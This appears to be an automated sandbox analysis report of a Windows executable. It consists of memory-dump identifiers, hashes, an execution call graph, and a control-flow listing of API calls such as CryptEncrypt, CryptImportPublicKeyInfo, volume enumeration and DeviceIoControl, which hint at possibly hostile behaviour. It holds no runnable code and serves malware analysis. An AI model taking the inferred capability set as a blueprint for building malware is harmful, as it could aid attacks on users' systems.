                                                                      • Associated: 0000000B.00000002.1720131032.00007FF73CFC0000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720178419.00007FF73CFCA000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720202038.00007FF73CFCE000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 0000000B.00000002.1720224040.00007FF73CFD1000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff73cfc0000_2594.jbxd
                                                                      Similarity
                                                                      • API ID: _amsg_exit_getptd$_lock
                                                                      • String ID:
                                                                      • API String ID: 3670291111-0
                                                                      • Opcode ID: 993534dfc6f72033878c1470825db430e2c975b239a47a9683bd1f3504e1619f
                                                                      • Instruction ID: c6f8f274cd57cba724161c3a75c1873899f5e2821da765a43ac26e5c9c17701c
                                                                      • Opcode Fuzzy Hash: 993534dfc6f72033878c1470825db430e2c975b239a47a9683bd1f3504e1619f
                                                                      • Instruction Fuzzy Hash: B2F04F13B09043A2FB54B75088517B893D0AF54704F888935DA8D4B3C2DE1CA444F260

                                                                      Execution Graph

                                                                      Execution Coverage:5.4%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:3.7%
                                                                      Total number of Nodes:1716
                                                                      Total number of Limit Nodes:74
                                                                      execution_graph 10278 df691c 10285 dfb481 10278->10285 10281 df692f 10283 df5e4c _free 66 API calls 10281->10283 10284 df693a 10283->10284 10298 dfb3a7 10285->10298 10287 df6921 10287->10281 10288 dfb25b 10287->10288 10289 dfb267 ___lock_fhandle 10288->10289 10290 df94b6 __lock 66 API calls 10289->10290 10293 dfb273 10290->10293 10291 dfb2d9 10328 dfb2ee 10291->10328 10293->10291 10296 dfb2ae RtlDeleteCriticalSection 10293->10296 10315 dfdf40 10293->10315 10294 dfb2e5 ___lock_fhandle 10294->10281 10297 df5e4c _free 66 API calls 10296->10297 10297->10293 10299 dfb3b3 ___lock_fhandle 10298->10299 10300 df94b6 __lock 66 API calls 10299->10300 10303 dfb3c2 10300->10303 10301 dfb45a 10311 dfb478 10301->10311 10303->10301 10305 df697d _flsall 67 API calls 10303->10305 10307 dfb35f 101 API calls __fflush_nolock 10303->10307 10308 dfb449 10303->10308 10304 dfb466 ___lock_fhandle 10304->10287 10305->10303 10307->10303 10309 df69eb _vwscanf 2 API calls 10308->10309 10310 dfb457 10309->10310 10310->10303 10314 df93dd RtlLeaveCriticalSection 10311->10314 10313 dfb47f 10313->10304 10314->10313 10316 dfdf4c ___lock_fhandle 10315->10316 10317 dfdf5e 10316->10317 10318 dfdf73 10316->10318 10319 df7924 __cftof2_l 66 API calls 10317->10319 10325 dfdf6e ___lock_fhandle 10318->10325 10331 df693c 10318->10331 10320 dfdf63 10319->10320 10322 df78d2 __cftof2_l 11 API calls 10320->10322 10322->10325 10325->10293 10418 df93dd RtlLeaveCriticalSection 10328->10418 10330 dfb2f5 10330->10294 10332 df694e 10331->10332 10333 df6970 RtlEnterCriticalSection 10331->10333 10332->10333 10334 df6956 10332->10334 10336 df6966 10333->10336 10335 df94b6 __lock 66 API calls 10334->10335 10335->10336 10337 dfded3 10336->10337 10338 dfdef8 10337->10338 10339 dfdee4 10337->10339 10341 dfdef4 10338->10341 10342 dfb2f7 __flush 97 API calls 10338->10342 10340 df7924 __cftof2_l 66 API calls 10339->10340 10343 dfdee9 10340->10343 10353 dfdfac 
10341->10353 10344 dfdf04 10342->10344 10345 df78d2 __cftof2_l 11 API calls 10343->10345 10356 dff0b2 10344->10356 10345->10341 10348 dfb4e0 __input_l 66 API calls 10349 dfdf12 10348->10349 10360 dfefee 10349->10360 10351 dfdf18 10351->10341 10352 df5e4c _free 66 API calls 10351->10352 10352->10341 10411 df69af 10353->10411 10355 dfdfb2 10355->10325 10357 dff0c2 10356->10357 10359 dfdf0c 10356->10359 10358 df5e4c _free 66 API calls 10357->10358 10357->10359 10358->10359 10359->10348 10361 dfeffa ___lock_fhandle 10360->10361 10362 dff01d 10361->10362 10363 dff002 10361->10363 10365 dff029 10362->10365 10368 dff063 10362->10368 10364 df7937 __lseeki64 66 API calls 10363->10364 10366 dff007 10364->10366 10367 df7937 __lseeki64 66 API calls 10365->10367 10369 df7924 __cftof2_l 66 API calls 10366->10369 10370 dff02e 10367->10370 10371 dfe676 ___lock_fhandle 68 API calls 10368->10371 10372 dff00f ___lock_fhandle 10369->10372 10373 df7924 __cftof2_l 66 API calls 10370->10373 10374 dff069 10371->10374 10372->10351 10375 dff036 10373->10375 10376 dff077 10374->10376 10377 dff083 10374->10377 10378 df78d2 __cftof2_l 11 API calls 10375->10378 10383 dfef52 10376->10383 10380 df7924 __cftof2_l 66 API calls 10377->10380 10378->10372 10381 dff07d 10380->10381 10398 dff0aa 10381->10398 10384 dfe60d __close_nolock 66 API calls 10383->10384 10387 dfef62 10384->10387 10385 dfefb8 10401 dfe587 10385->10401 10387->10385 10388 dfef96 10387->10388 10391 dfe60d __close_nolock 66 API calls 10387->10391 10388->10385 10389 dfe60d __close_nolock 66 API calls 10388->10389 10393 dfefa2 CloseHandle 10389->10393 10392 dfef8d 10391->10392 10395 dfe60d __close_nolock 66 API calls 10392->10395 10393->10385 10396 dfefae GetLastError 10393->10396 10394 dfefe2 10394->10381 10395->10388 10396->10385 10397 df794a __dosmaperr 66 API calls 10397->10394 10410 dfe715 RtlLeaveCriticalSection 10398->10410 10400 dff0b0 10400->10372 10402 dfe598 10401->10402 10403 dfe5f3 10401->10403 10402->10403 10407 dfe5c3 
10402->10407 10404 df7924 __cftof2_l 66 API calls 10403->10404 10405 dfe5f8 10404->10405 10406 df7937 __lseeki64 66 API calls 10405->10406 10408 dfe5e9 10406->10408 10407->10408 10409 dfe5e3 SetStdHandle 10407->10409 10408->10394 10408->10397 10409->10408 10410->10400 10412 df69df RtlLeaveCriticalSection 10411->10412 10413 df69c0 10411->10413 10412->10355 10413->10412 10414 df69c7 10413->10414 10417 df93dd RtlLeaveCriticalSection 10414->10417 10416 df69dc 10416->10355 10417->10416 10418->10330 9873 dfc4d9 9874 dfc4dc 9873->9874 9877 dfe73c 9874->9877 9886 dfc554 RtlDecodePointer 9877->9886 9879 dfe74c 9882 dfe764 9879->9882 9883 df7757 __call_reportfault 8 API calls 9879->9883 9880 dfe741 9880->9879 9887 dfc561 9880->9887 9884 df7f7a __amsg_exit 66 API calls 9882->9884 9883->9882 9885 dfe76e 9884->9885 9886->9880 9890 dfc56d ___lock_fhandle 9887->9890 9888 dfc5c8 9889 dfc5aa RtlDecodePointer 9888->9889 9894 dfc5d7 9888->9894 9896 dfc599 _siglookup 9889->9896 9890->9888 9890->9889 9891 dfc594 9890->9891 9895 dfc590 9890->9895 9892 dfa03d __getptd_noexit 66 API calls 9891->9892 9892->9896 9897 df7924 __cftof2_l 66 API calls 9894->9897 9895->9891 9895->9894 9898 dfc634 9896->9898 9899 dfc5a2 ___lock_fhandle 9896->9899 9901 df7f7a __amsg_exit 66 API calls 9896->9901 9900 dfc5dc 9897->9900 9903 df94b6 __lock 66 API calls 9898->9903 9904 dfc63f 9898->9904 9899->9879 9902 df78d2 __cftof2_l 11 API calls 9900->9902 9901->9898 9902->9899 9903->9904 9906 dfc674 9904->9906 9908 df9f06 RtlEncodePointer 9904->9908 9909 dfc6c8 9906->9909 9908->9906 9910 dfc6ce 9909->9910 9912 dfc6d5 9909->9912 9913 df93dd RtlLeaveCriticalSection 9910->9913 9912->9899 9913->9912 9981 dfa0d0 9982 dfa0dc ___lock_fhandle 9981->9982 9983 dfa0f4 9982->9983 9985 dfa1de ___lock_fhandle 9982->9985 9986 df5e4c _free 66 API calls 9982->9986 9984 dfa102 9983->9984 9987 df5e4c _free 66 API calls 9983->9987 9988 dfa110 9984->9988 9989 df5e4c _free 66 API calls 9984->9989 9986->9983 9987->9984 9990 df5e4c _free 
66 API calls 9988->9990 9992 dfa11e 9988->9992 9989->9988 9990->9992 9991 dfa12c 9993 dfa13a 9991->9993 9995 df5e4c _free 66 API calls 9991->9995 9992->9991 9994 df5e4c _free 66 API calls 9992->9994 9996 dfa148 9993->9996 9997 df5e4c _free 66 API calls 9993->9997 9994->9991 9995->9993 9998 dfa159 9996->9998 9999 df5e4c _free 66 API calls 9996->9999 9997->9996 10000 df94b6 __lock 66 API calls 9998->10000 9999->9998 10001 dfa161 10000->10001 10002 dfa16d InterlockedDecrement 10001->10002 10003 dfa186 10001->10003 10002->10003 10004 dfa178 10002->10004 10017 dfa1ea 10003->10017 10004->10003 10007 df5e4c _free 66 API calls 10004->10007 10007->10003 10008 df94b6 __lock 66 API calls 10009 dfa19a 10008->10009 10010 dfa1cb 10009->10010 10012 df9c5c ___removelocaleref 8 API calls 10009->10012 10020 dfa1f6 10010->10020 10015 dfa1af 10012->10015 10014 df5e4c _free 66 API calls 10014->9985 10015->10010 10016 df9cf5 ___freetlocinfo 66 API calls 10015->10016 10016->10010 10023 df93dd RtlLeaveCriticalSection 10017->10023 10019 dfa193 10019->10008 10024 df93dd RtlLeaveCriticalSection 10020->10024 10022 dfa1d8 10022->10014 10023->10019 10024->10022 10552 df43b7 10553 df43c0 10552->10553 10554 df3d00 5 API calls 10553->10554 10555 df43f0 CryptReleaseContext 10553->10555 10554->10553 10557 df4415 10555->10557 10558 df4070 40 API calls 10557->10558 10559 df441a 10558->10559 10560 df5c9f __ld12tod 5 API calls 10559->10560 10561 df4428 10560->10561 8107 df65f4 8108 df6600 ___lock_fhandle 8107->8108 8109 df660a HeapSetInformation 8108->8109 8111 df6615 8108->8111 8109->8111 8144 df7cc3 HeapCreate 8111->8144 8112 df6663 8113 df666e 8112->8113 8248 df65cb 8112->8248 8145 dfa1ff GetModuleHandleW 8113->8145 8116 df6674 8117 df667f __RTC_Initialize 8116->8117 8118 df65cb _fast_error_exit 66 API calls 8116->8118 8170 dfadf6 GetStartupInfoW 8117->8170 8118->8117 8121 df6699 GetCommandLineW 8183 dfad9e GetEnvironmentStringsW 8121->8183 8125 df66a9 8190 dfacf0 GetModuleFileNameW 8125->8190 8128 
df66be 8196 dfaabe 8128->8196 8129 df7fae __amsg_exit 66 API calls 8129->8128 8131 df66c4 8132 df66cf 8131->8132 8133 df7fae __amsg_exit 66 API calls 8131->8133 8210 df7d8d 8132->8210 8133->8132 8135 df66d7 8136 df66e2 8135->8136 8137 df7fae __amsg_exit 66 API calls 8135->8137 8216 df5660 8136->8216 8137->8136 8140 df6710 8263 df7f90 8140->8263 8143 df6715 ___lock_fhandle 8144->8112 8146 dfa21c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 8145->8146 8147 dfa213 8145->8147 8149 dfa266 TlsAlloc 8146->8149 8266 df9f4c 8147->8266 8152 dfa375 8149->8152 8153 dfa2b4 TlsSetValue 8149->8153 8152->8116 8153->8152 8154 dfa2c5 8153->8154 8271 df7d36 8154->8271 8159 dfa30d RtlDecodePointer 8162 dfa322 8159->8162 8160 dfa370 8161 df9f4c __mtterm 2 API calls 8160->8161 8161->8152 8162->8160 8280 dfb16f 8162->8280 8165 dfa340 RtlDecodePointer 8166 dfa351 8165->8166 8166->8160 8167 dfa355 8166->8167 8286 df9f89 8167->8286 8169 dfa35d GetCurrentThreadId 8169->8152 8171 dfb16f __calloc_crt 66 API calls 8170->8171 8180 dfae14 8171->8180 8172 dfafbf GetStdHandle 8177 dfaf89 8172->8177 8173 dfb16f __calloc_crt 66 API calls 8173->8180 8174 dfb023 SetHandleCount 8182 df668d 8174->8182 8175 dfafd1 GetFileType 8175->8177 8176 dfaf09 8176->8177 8178 dfaf35 GetFileType 8176->8178 8179 dfaf40 InitializeCriticalSectionAndSpinCount 8176->8179 8177->8172 8177->8174 8177->8175 8181 dfaff7 InitializeCriticalSectionAndSpinCount 8177->8181 8178->8176 8178->8179 8179->8176 8179->8182 8180->8173 8180->8176 8180->8177 8180->8182 8181->8177 8181->8182 8182->8121 8256 df7fae 8182->8256 8184 dfadaf 8183->8184 8185 dfadb3 8183->8185 8184->8125 8187 dfb12a __malloc_crt 66 API calls 8185->8187 8188 dfadd5 _memmove 8187->8188 8189 dfaddc FreeEnvironmentStringsW 8188->8189 8189->8125 8191 dfad25 _wparse_cmdline 8190->8191 8192 df66b3 8191->8192 8193 dfad62 8191->8193 8192->8128 8192->8129 8194 dfb12a __malloc_crt 66 API calls 8193->8194 8195 dfad68 _wparse_cmdline 8194->8195 8195->8192 8197 
dfaad6 _wcslen 8196->8197 8201 dfaace 8196->8201 8198 dfb16f __calloc_crt 66 API calls 8197->8198 8204 dfaafa _wcslen 8198->8204 8199 dfab50 8200 df5e4c _free 66 API calls 8199->8200 8200->8201 8201->8131 8202 dfb16f __calloc_crt 66 API calls 8202->8204 8203 dfab76 8205 df5e4c _free 66 API calls 8203->8205 8204->8199 8204->8201 8204->8202 8204->8203 8206 dfa809 __NMSG_WRITE 66 API calls 8204->8206 8207 dfab8d 8204->8207 8205->8201 8206->8204 8208 df7880 __invoke_watson 10 API calls 8207->8208 8209 dfab99 8208->8209 8209->8131 8212 df7d9b __IsNonwritableInCurrentImage 8210->8212 8527 dfb68d 8212->8527 8213 df7db9 __initterm_e 8215 df7dda __IsNonwritableInCurrentImage 8213->8215 8530 dfc845 8213->8530 8215->8135 8595 df52d0 GetFileAttributesW 8216->8595 8223 df576a 8225 df578a 8223->8225 8231 df5796 8223->8231 8723 df5510 8223->8723 8619 df4550 8225->8619 8229 df5c9f __ld12tod 5 API calls 8232 df57ac 8229->8232 8230 df56b4 8230->8231 8233 df56ff CreateEventW SetConsoleCtrlHandler 8230->8233 8656 df5150 8231->8656 8232->8140 8245 df7f64 8232->8245 8671 df5b90 8233->8671 8241 df5742 WaitForSingleObject 8242 df575d Sleep 8241->8242 8243 df5758 8241->8243 8242->8231 8716 df5bf0 GetSystemDirectoryW 8243->8716 9828 df7e24 8245->9828 8247 df7f75 8247->8140 8249 df65de 8248->8249 8250 df65d9 8248->8250 8252 df7ff4 __NMSG_WRITE 66 API calls 8249->8252 8251 df81a3 __FF_MSGBANNER 66 API calls 8250->8251 8251->8249 8253 df65e6 8252->8253 8254 df7d0c _doexit 3 API calls 8253->8254 8255 df65f0 8254->8255 8255->8113 8257 df81a3 __FF_MSGBANNER 66 API calls 8256->8257 8258 df7fb8 8257->8258 8259 df7ff4 __NMSG_WRITE 66 API calls 8258->8259 8260 df7fc0 8259->8260 9858 df7f7a 8260->9858 8264 df7e24 _doexit 66 API calls 8263->8264 8265 df7f9b 8264->8265 8265->8143 8267 df9f65 8266->8267 8268 df9f56 RtlDecodePointer 8266->8268 8269 df9f76 TlsFree 8267->8269 8270 df9f84 8267->8270 8268->8267 8269->8270 8270->8270 8299 df9f06 RtlEncodePointer 8271->8299 8273 df7d3e __init_pointers 
__initp_misc_winsig 8300 dfc4ee RtlEncodePointer 8273->8300 8275 df7d64 RtlEncodePointer RtlEncodePointer RtlEncodePointer RtlEncodePointer 8276 df933c 8275->8276 8277 df9347 8276->8277 8278 df9351 InitializeCriticalSectionAndSpinCount 8277->8278 8279 df9374 8277->8279 8278->8277 8278->8279 8279->8159 8279->8160 8282 dfb178 8280->8282 8283 dfa338 8282->8283 8284 dfb196 Sleep 8282->8284 8301 dfdd36 8282->8301 8283->8160 8283->8165 8285 dfb1ab 8284->8285 8285->8282 8285->8283 8338 df7970 8286->8338 8288 df9f95 GetModuleHandleW 8339 df94b6 8288->8339 8290 df9fd3 InterlockedIncrement 8346 dfa02b 8290->8346 8293 df94b6 __lock 64 API calls 8294 df9ff4 8293->8294 8349 df9bcd InterlockedIncrement 8294->8349 8296 dfa012 8361 dfa034 8296->8361 8298 dfa01f ___lock_fhandle 8298->8169 8299->8273 8300->8275 8302 dfdd42 8301->8302 8308 dfdd5d 8301->8308 8303 dfdd4e 8302->8303 8302->8308 8310 df7924 8303->8310 8305 dfdd70 HeapAlloc 8307 dfdd97 8305->8307 8305->8308 8307->8282 8308->8305 8308->8307 8313 df81eb RtlDecodePointer 8308->8313 8315 dfa03d GetLastError 8310->8315 8312 df7929 8312->8282 8314 df8200 8313->8314 8314->8308 8329 df9f18 TlsGetValue 8315->8329 8318 dfa0aa SetLastError 8318->8312 8319 dfb16f __calloc_crt 62 API calls 8320 dfa068 8319->8320 8320->8318 8321 dfa070 RtlDecodePointer 8320->8321 8322 dfa085 8321->8322 8323 dfa089 8322->8323 8324 dfa0a1 8322->8324 8325 df9f89 __initptd 62 API calls 8323->8325 8332 df5e4c 8324->8332 8328 dfa091 GetCurrentThreadId 8325->8328 8327 dfa0a7 8327->8318 8328->8318 8330 df9f2d RtlDecodePointer TlsSetValue 8329->8330 8331 df9f48 8329->8331 8330->8331 8331->8318 8331->8319 8333 df5e57 HeapFree 8332->8333 8334 df5e80 __dosmaperr 8332->8334 8333->8334 8335 df5e6c 8333->8335 8334->8327 8336 df7924 __cftof2_l 64 API calls 8335->8336 8337 df5e72 GetLastError 8336->8337 8337->8334 8338->8288 8340 df94de RtlEnterCriticalSection 8339->8340 8341 df94cb 8339->8341 8340->8290 8364 df93f4 8341->8364 8343 df94d1 8343->8340 8344 df7fae 
__amsg_exit 65 API calls 8343->8344 8345 df94dd 8344->8345 8345->8340 8525 df93dd RtlLeaveCriticalSection 8346->8525 8348 df9fed 8348->8293 8350 df9bee 8349->8350 8351 df9beb InterlockedIncrement 8349->8351 8352 df9bfb 8350->8352 8353 df9bf8 InterlockedIncrement 8350->8353 8351->8350 8354 df9c08 8352->8354 8355 df9c05 InterlockedIncrement 8352->8355 8353->8352 8356 df9c12 InterlockedIncrement 8354->8356 8357 df9c15 8354->8357 8355->8354 8356->8357 8358 df9c2e InterlockedIncrement 8357->8358 8359 df9c3e InterlockedIncrement 8357->8359 8360 df9c49 InterlockedIncrement 8357->8360 8358->8357 8359->8357 8360->8296 8526 df93dd RtlLeaveCriticalSection 8361->8526 8363 dfa03b 8363->8298 8366 df9400 ___lock_fhandle 8364->8366 8365 df9426 8372 df9436 ___lock_fhandle 8365->8372 8425 dfb12a 8365->8425 8366->8365 8389 df81a3 8366->8389 8372->8343 8374 df9448 8377 df7924 __cftof2_l 65 API calls 8374->8377 8375 df9457 8378 df94b6 __lock 65 API calls 8375->8378 8377->8372 8379 df945e 8378->8379 8380 df9466 InitializeCriticalSectionAndSpinCount 8379->8380 8381 df9491 8379->8381 8382 df9482 8380->8382 8383 df9476 8380->8383 8384 df5e4c _free 65 API calls 8381->8384 8430 df94ad 8382->8430 8385 df5e4c _free 65 API calls 8383->8385 8384->8382 8386 df947c 8385->8386 8388 df7924 __cftof2_l 65 API calls 8386->8388 8388->8382 8433 dfcb25 8389->8433 8391 df81aa 8392 dfcb25 __NMSG_WRITE 66 API calls 8391->8392 8394 df81b7 8391->8394 8392->8394 8393 df7ff4 __NMSG_WRITE 66 API calls 8395 df81cf 8393->8395 8394->8393 8397 df81d9 8394->8397 8396 df7ff4 __NMSG_WRITE 66 API calls 8395->8396 8396->8397 8398 df7ff4 8397->8398 8399 df8015 __NMSG_WRITE 8398->8399 8401 dfcb25 __NMSG_WRITE 63 API calls 8399->8401 8421 df8131 8399->8421 8403 df802f 8401->8403 8402 df81a1 8422 df7d0c 8402->8422 8404 df8140 GetStdHandle 8403->8404 8405 dfcb25 __NMSG_WRITE 63 API calls 8403->8405 8408 df814e _strlen 8404->8408 8404->8421 8406 df8040 8405->8406 8406->8404 8407 df8052 8406->8407 8407->8421 8458 dfa809 
8407->8458 8411 df8184 WriteFile 8408->8411 8408->8421 8411->8421 8412 df807e GetModuleFileNameW 8413 df809f 8412->8413 8417 df80ab _wcslen 8412->8417 8414 dfa809 __NMSG_WRITE 63 API calls 8413->8414 8414->8417 8415 df7880 __invoke_watson 10 API calls 8415->8417 8416 dfc9c8 63 API calls __NMSG_WRITE 8416->8417 8417->8415 8417->8416 8419 df8121 8417->8419 8467 dfca3d 8417->8467 8476 dfc85c 8419->8476 8494 df5c9f 8421->8494 8504 df7ce1 GetModuleHandleW 8422->8504 8428 dfb133 8425->8428 8427 df9441 8427->8374 8427->8375 8428->8427 8429 dfb14a Sleep 8428->8429 8508 df5e86 8428->8508 8429->8428 8524 df93dd RtlLeaveCriticalSection 8430->8524 8432 df94b4 8432->8372 8434 dfcb31 8433->8434 8435 dfcb3b 8434->8435 8436 df7924 __cftof2_l 66 API calls 8434->8436 8435->8391 8437 dfcb54 8436->8437 8440 df78d2 8437->8440 8443 df78a5 RtlDecodePointer 8440->8443 8444 df78ba 8443->8444 8449 df7880 8444->8449 8446 df78d1 8447 df78a5 __cftof2_l 10 API calls 8446->8447 8448 df78de 8447->8448 8448->8391 8452 df7757 8449->8452 8453 df7776 _memset __call_reportfault 8452->8453 8454 df7794 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8453->8454 8455 df7862 __call_reportfault 8454->8455 8456 df5c9f __ld12tod 5 API calls 8455->8456 8457 df787e GetCurrentProcess TerminateProcess 8456->8457 8457->8446 8459 dfa81e 8458->8459 8460 dfa817 8458->8460 8461 df7924 __cftof2_l 66 API calls 8459->8461 8460->8459 8465 dfa83f 8460->8465 8462 dfa823 8461->8462 8463 df78d2 __cftof2_l 11 API calls 8462->8463 8464 df8073 8463->8464 8464->8412 8464->8417 8465->8464 8466 df7924 __cftof2_l 66 API calls 8465->8466 8466->8462 8471 dfca4f 8467->8471 8468 dfca53 8469 dfca58 8468->8469 8470 df7924 __cftof2_l 66 API calls 8468->8470 8469->8417 8475 dfca6f 8470->8475 8471->8468 8471->8469 8473 dfca96 8471->8473 8472 df78d2 __cftof2_l 11 API calls 8472->8469 8473->8469 8474 df7924 __cftof2_l 66 API calls 8473->8474 8474->8475 8475->8472 8502 df9f06 RtlEncodePointer 8476->8502 8478 dfc882 8479 
dfc892 LoadLibraryW 8478->8479 8481 dfc90f 8478->8481 8480 dfc8a7 GetProcAddress 8479->8480 8482 dfc9a7 8479->8482 8480->8482 8485 dfc8bd 7 API calls 8480->8485 8486 dfc929 RtlDecodePointer RtlDecodePointer 8481->8486 8491 dfc93c 8481->8491 8487 df5c9f __ld12tod 5 API calls 8482->8487 8483 dfc99b RtlDecodePointer 8483->8482 8484 dfc972 RtlDecodePointer 8484->8483 8488 dfc979 8484->8488 8485->8481 8489 dfc8ff GetProcAddress RtlEncodePointer 8485->8489 8486->8491 8490 dfc9c6 8487->8490 8488->8483 8492 dfc98c RtlDecodePointer 8488->8492 8489->8481 8490->8421 8491->8483 8491->8484 8493 dfc95f 8491->8493 8492->8483 8492->8493 8493->8483 8495 df5ca9 IsDebuggerPresent 8494->8495 8496 df5ca7 8494->8496 8503 dfb122 8495->8503 8496->8402 8499 df682c SetUnhandledExceptionFilter UnhandledExceptionFilter 8500 df6849 __call_reportfault 8499->8500 8501 df6851 GetCurrentProcess TerminateProcess 8499->8501 8500->8501 8501->8402 8502->8478 8503->8499 8505 df7d0a ExitProcess 8504->8505 8506 df7cf5 GetProcAddress 8504->8506 8506->8505 8507 df7d05 8506->8507 8507->8505 8509 df5f03 8508->8509 8516 df5e94 8508->8516 8510 df81eb _malloc RtlDecodePointer 8509->8510 8511 df5f09 8510->8511 8512 df7924 __cftof2_l 65 API calls 8511->8512 8515 df5efb 8512->8515 8513 df81a3 __FF_MSGBANNER 65 API calls 8513->8516 8514 df5ec2 HeapAlloc 8514->8515 8514->8516 8515->8428 8516->8513 8516->8514 8517 df7ff4 __NMSG_WRITE 65 API calls 8516->8517 8518 df5eef 8516->8518 8519 df81eb _malloc RtlDecodePointer 8516->8519 8521 df7d0c _doexit 3 API calls 8516->8521 8522 df5eed 8516->8522 8517->8516 8520 df7924 __cftof2_l 65 API calls 8518->8520 8519->8516 8520->8522 8521->8516 8523 df7924 __cftof2_l 65 API calls 8522->8523 8523->8515 8524->8432 8525->8348 8526->8363 8528 dfb693 RtlEncodePointer 8527->8528 8528->8528 8529 dfb6ad 8528->8529 8529->8213 8533 dfc809 8530->8533 8532 dfc852 8532->8215 8534 dfc815 ___lock_fhandle 8533->8534 8541 df7d24 8534->8541 8540 dfc836 ___lock_fhandle 8540->8532 8542 df94b6 __lock 
[Execution graph fragment: text spilled from the rendered call-graph image. Node identifiers and edge lists (e.g. 8541->8542) are omitted; only the recoverable information is kept.]

Graph nodes are code addresses of download.exe in the range 0xdf1080 to 0xdfe78f, each annotated with the Windows API and CRT functions reached from that node. The fragment is cut at both ends and links to nodes in adjacent sections of the report.

API functions recovered from this fragment, grouped by area:

File, volume and device I/O: CreateFileW, CloseHandle, ReadFile, WriteFile, SetFilePointer, GetFileSize, DeviceIoControl, FindFirstVolumeW, FindNextVolumeW, FindVolumeClose, GetLogicalDrives, GetDriveTypeW, PathAppendW

Process, thread and synchronization: CreateProcessW, CreateThread, CreateEventW, WaitForSingleObject, Sleep, GetCurrentThreadId, TlsGetValue, TlsSetValue, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSectionAndSpinCount, RtlEnterCriticalSection, RtlLeaveCriticalSection

Memory: VirtualAlloc, VirtualLock, VirtualUnlock, VirtualQuery, VirtualFree, GetProcessHeap, HeapAlloc, HeapFree, RtlSizeHeap, RtlReAllocateHeap, LocalAlloc, LocalFree, RtlEncodePointer, RtlDecodePointer

Cryptography: CryptAcquireContextW, CryptGenRandom, CryptReleaseContext, CryptStringToBinaryW, CryptDecodeObjectEx, CryptImportPublicKeyInfo, CryptEncrypt, CryptDestroyKey, CryptBinaryToStringW

System and environment information: GetVersion, GetSystemDirectoryW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetModuleFileNameW, GetCommandLineW, GetCommandLineA, GetSystemDefaultLCID, GetTimeZoneInformation, GetLocalTime, SystemTimeToFileTime, FileTimeToSystemTime, NetWkstaGetInfo, GetLastError

Resources, windows and hooks: FindResourceW, SizeofResource, LoadResource, LockResource, EnumWindows, SetWindowsHookExW

COM: CoInitialize, CoCreateInstance, CoUninitialize

Console and strings: GetStdHandle, GetConsoleScreenBufferInfo, FillConsoleOutputCharacterW, SetConsoleCursorPosition, GetConsoleMode, SetConsoleMode, GetConsoleCP, ReadConsoleInputA, WriteConsoleW, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, lstrcatW

CRT-internal routines labelled in the graph include _malloc, _free, __realloc_crt, __malloc_crt, _memset, _memmove, _wprintf, _wscanf, __snwprintf, __flsbuf, __flswbuf, __write, __write_nolock, __lseeki64, __dosmaperr, __getptd, __lock, __ld12tod and __cftof2_l.
RtlEncodePointer 9842->9854 9843 df7f5c 9843->8247 9844->9843 9856 df93dd RtlLeaveCriticalSection 9844->9856 9855 df9f06 RtlEncodePointer 9845->9855 9848->9842 9850 df7f2f 9849->9850 9851 df7f55 9849->9851 9850->9836 9853 df93dd RtlLeaveCriticalSection 9850->9853 9857 df93dd RtlLeaveCriticalSection 9851->9857 9853->9839 9854->9842 9855->9842 9856->9843 9857->9850 9859 df7e24 _doexit 66 API calls 9858->9859 9860 df7f8b 9859->9860 9861 df3df0 6 API calls 9862 df3e83 9861->9862 9865 df3e92 9861->9865 9869 df3da0 9862->9869 9864 df3d00 5 API calls 9864->9865 9865->9864 9866 df3ecd 9865->9866 9866->9866 9867 df5c9f __ld12tod 5 API calls 9866->9867 9868 df3ef1 9867->9868 9870 df3dd8 9869->9870 9871 df3da7 9869->9871 9870->9865 9870->9870 9871->9870 9872 df3d00 5 API calls 9871->9872 9872->9871 10784 df4223 10787 df4230 10784->10787 10785 df3d00 5 API calls 10785->10787 10786 df4260 EnumWindows 10789 df3d00 5 API calls 10786->10789 10787->10785 10787->10786 10790 df4288 10789->10790 10791 df5c9f __ld12tod 5 API calls 10790->10791 10792 df4293 10791->10792

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetDesktopWindow.USER32 ref: 00DF4084
                                                                      • GetForegroundWindow.USER32 ref: 00DF4090
                                                                      • GetShellWindow.USER32 ref: 00DF409C
                                                                      • GetCapture.USER32 ref: 00DF40A8
                                                                      • GetClipboardOwner.USER32 ref: 00DF40B4
                                                                      • GetOpenClipboardWindow.USER32 ref: 00DF40C0
                                                                      • GetCurrentProcessId.KERNEL32 ref: 00DF40CC
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00DF40D8
                                                                      • GetTickCount.KERNEL32 ref: 00DF40E4
                                                                      • GetFocus.USER32 ref: 00DF40F0
                                                                      • GetActiveWindow.USER32 ref: 00DF40FC
                                                                      • GetKBCodePage.USER32 ref: 00DF4108
                                                                      • GetCursor.USER32 ref: 00DF4114
                                                                      • GetLastActivePopup.USER32(?), ref: 00DF4127
                                                                      • GetProcessHeap.KERNEL32 ref: 00DF4133
                                                                      • GetQueueStatus.USER32(000004BF), ref: 00DF4144
                                                                      • GetInputState.USER32 ref: 00DF4150
                                                                      • GetMessageTime.USER32 ref: 00DF415C
                                                                      • GetOEMCP.KERNEL32 ref: 00DF4168
                                                                      • GetCursorInfo.USER32(?), ref: 00DF4193
                                                                      • GetCaretPos.USER32(?), ref: 00DF41A0
                                                                      • GetCurrentThread.KERNEL32 ref: 00DF41C2
                                                                      • GetThreadTimes.KERNEL32(00000000), ref: 00DF41C9
                                                                      • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00DF41EE
                                                                      • GetProcessTimes.KERNELBASE(00000000), ref: 00DF41F1
                                                                      • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00DF41FD
                                                                      • K32GetProcessMemoryInfo.KERNEL32(00000000), ref: 00DF4200
                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 00DF420A
                                                                      • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00DF4214
                                                                      • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00DF427D
